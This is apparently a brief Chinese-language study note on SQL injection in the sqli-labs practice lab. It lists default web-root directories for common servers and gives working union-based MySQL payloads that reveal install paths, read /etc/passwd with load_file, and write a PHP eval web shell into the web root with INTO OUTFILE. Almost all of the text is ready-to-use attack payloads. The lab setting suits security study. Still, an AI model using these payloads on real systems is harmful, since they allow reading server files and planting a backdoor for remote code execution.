在使用sqli-labs Less-7测试的时候一直有问题,无奈改用Less-1
winserver的iis默认路径c:\Inetpub\wwwroot
linux的nginx一般是/usr/local/nginx/html,/home/wwwroot/default,/usr/share/nginx,/var/www/htm等
apache 就…/var/www/htm,…/var/www/html/htdocs
phpstudy 就是…\PhpStudy20180211\PHPTutorial\WWW\
xammp 就是…\xampp\htdocs
可以使用这个payload来读取路径
?id=-1 union select 1,@@basedir,@@datadir --+
读文件
payload
?id=-1' union select 1,2,load_file("/etc/passwd") --+
写文件
payload
?id=1' union select 1,2,'<?php @eval($_POST["cmd"]);?>' into outfile "C:\\phpStudy\\PHPTutorial\\WWW\\2.php" --+
测试